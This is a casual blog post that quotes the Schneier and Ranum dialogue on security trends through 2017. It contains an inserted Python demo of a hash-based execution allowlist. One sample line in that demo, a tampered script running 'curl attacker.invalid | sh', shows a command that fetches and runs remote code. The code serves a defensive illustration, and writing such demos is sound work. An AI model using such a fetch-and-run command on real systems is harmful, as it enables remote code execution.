http://www.schneier.com/blog/archives/2007/12/security_in_ten.html

Ah! After an hour-long debate today with teammates and pals on security and its issues, I felt like digging into some stuff... so here comes one of my favourite authors... Schneier... err... don't remember? Arre... Bruce Schneier... read his books? Read 'em :)

Bruce Schneier: Predictions are easy and difficult. Roy Amara of the Institute for the Future once said:
"We tend to overestimate the effect of a technology in the short run and underestimate the effect in the long run."
Cool quote :)

Moore's Law is easy: In 10 years, computers will be 100 times more powerful. My desktop will fit into my cell phone, we'll have gigabit wireless connectivity everywhere, and personal networks will connect our computing devices and the remote services we subscribe to. Other aspects of the future are much more difficult to predict. I don't think anyone can predict what the emergent properties of 100x computing power will bring: new uses for computing, new paradigms of communication. A 100x world will be different, in ways that will be surprising.

Throughout history and into the future, the one constant is human nature. There hasn't been a new crime invented in millennia. Fraud, theft, impersonation and counterfeiting are perennial problems that have been around since the beginning of society.
During the last 10 years, these crimes have migrated into cyberspace (Gosh! ask me... how I tackled it this year :(( :O)

The nature of the attacks will be different: the targets, tactics and results. Security is both a trade-off and an arms race, a balance between attacker and defender, and changes in technology upset that balance.

Technology might make one particular tactic more effective, or one particular security technology cheaper and more ubiquitous. Or a new emergent application might become a favored target.
I don't see anything by 2017 that will fundamentally alter this. Do you?

Marcus Ranum: I think you're right; at a meta-level, the problems are going to stay the same. What's shocking and disappointing to me is that our responses to those problems also remain the same, in spite of the obvious fact that they aren't effective. It's 2007 and we haven't seemed to accept that:
  • You can't turn shovelware into reliable software by patching it a whole lot.
  • You shouldn't mix production systems with non-production systems.
  • You actually have to know what's going on in your networks.
  • If you run your computers with an open execution runtime model you'll always get viruses, spyware and Trojan horses.
  • You can pass laws about locking barn doors after horses have left, but it won't put the horses back in the barn.
  • Security has to be designed in, as part of a system plan for reliability, rather than bolted on afterward.
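One concrete reading of Ranum's "open execution runtime model" bullet, added here as an illustration and not taken from the dialogue or from this blog: in an open model any file the user can reach is allowed to run; in a closed model the runtime first checks the binary against a list of approved content hashes and refuses everything else. The allowlist, the sample scripts, the "tampered" variant and the unknown dropper below are all constructed for the demo; the hashing is plain SHA-256 over the file's bytes, so a renamed copy of an approved program still runs while a one-byte change to it does not.

```python
"""Toy closed execution model: hash-based allowlist checked before a file may run.

Everything here (the approved script, the tampered copy, the unknown binary) is
constructed sample data for the demonstration, not taken from any real system.
"""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path
from typing import Dict


class ExecutionDenied(Exception):
    """Raised when a file's content hash is not on the allowlist."""


def sha256_of(path: Path) -> str:
    """Hex SHA-256 of the file at `path`, read in chunks so large binaries fit."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_allowlist(approved: Dict[str, bytes]) -> Dict[str, str]:
    """Map SHA-256 hex digest -> human label for each approved program body.

    Keying on content rather than on file name is what makes this an allowlist of
    *programs* instead of an allowlist of *paths*: the name can be anything.
    """
    return {hashlib.sha256(body).hexdigest(): label for label, body in approved.items()}


def check_execution(path: Path, allowlist: Dict[str, str]) -> str:
    """Gate that a closed execution model would call before exec().

    Returns the allowlist label on success; raises ExecutionDenied otherwise.
    """
    digest = sha256_of(path)
    label = allowlist.get(digest)
    if label is None:
        raise ExecutionDenied(f"{path.name}: sha256 {digest[:12]}... is not on the allowlist")
    return label


def demo() -> Dict[str, str]:
    """Run four constructed files through the gate and report ALLOW/DENY per file."""
    # Constructed "approved" backup script; its hash is the only thing the gate trusts.
    approved = {"backup.sh": b"#!/bin/sh\ntar czf /var/backups/home.tgz /home\n"}
    allowlist = build_allowlist(approved)

    candidates = {
        "backup.sh": approved["backup.sh"],                 # exact approved content
        "renamed.sh": approved["backup.sh"],                # same bytes, different name
        "backup_tampered.sh": approved["backup.sh"].replace(  # one inserted command
            b"tar czf", b"curl attacker.invalid | sh; tar czf"
        ),
        "dropper.exe": b"MZ\x90\x00constructed-unknown-binary",  # never approved
    }

    results: Dict[str, str] = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in candidates.items():
            target = Path(tmp) / name
            target.write_bytes(body)
            try:
                results[name] = "ALLOW:" + check_execution(target, allowlist)
            except ExecutionDenied:
                results[name] = "DENY"
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{verdict:16} {name}")
```

In an open model every one of those four files would run; the gate lets through only the two whose bytes match the approved script, which is the behaviour Ranum's bullet is asking for. A real deployment would keep the allowlist somewhere the unprivileged user cannot edit and would hook the actual exec path rather than a Python wrapper, but the decision logic is the same.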
Aw! Now... you missed one important aspect of the problem: By 2017, computers will be even more important to our lives, economies and infrastructure.

I've been pretty dismissive of the concepts of cyberwar and cyberterror. That dismissal was mostly motivated by my observation that the patchworked and kludgy nature of most computer systems acts as a form of defense in its own right, and that real-world attacks remain more cost-effective and practical for terror purposes.

I'd like to officially modify my position somewhat: I believe it's increasingly likely that we'll suffer catastrophic failures in critical infrastructure systems by 2017. It probably won't be terrorists that do it, though. HAHA!

More likely, we'll suffer some kind of horrible outage because a critical system was connected to a non-critical system that was connected to the Internet so someone could get to MySpace -- and that ancillary system gets a piece of malware. Or it'll be some incomprehensibly complex software, layered with Band-Aids and patches, that topples over when some "merely curious" hacker pushes the wrong e-button. We've got some bad-looking trend lines; all the indicators point toward a system that is more complex, less well-understood and more interdependent. With infrastructure like that, who needs enemies?

You're worried criminals will continue to penetrate into cyberspace, and I'm worried complexity, poor design and mismanagement will be there to meet them.

Bruce Schneier: I think we've already suffered that kind of critical systems failure. The August 2003 blackout that covered much of the northeastern United States and Canada -- 50 million people -- was caused by a software bug.

I don't disagree that things will continue to get worse. Complexity is the worst enemy of security, and the Internet -- and the computers and processes connected to it -- is getting more complex all the time. So things are getting worse, even though security technology is improving. One could say those critical insecurities are another emergent property of the 100x world of 2017.

Read more at one of my fav blogs, Schneier on Security, a blog on security and security technology.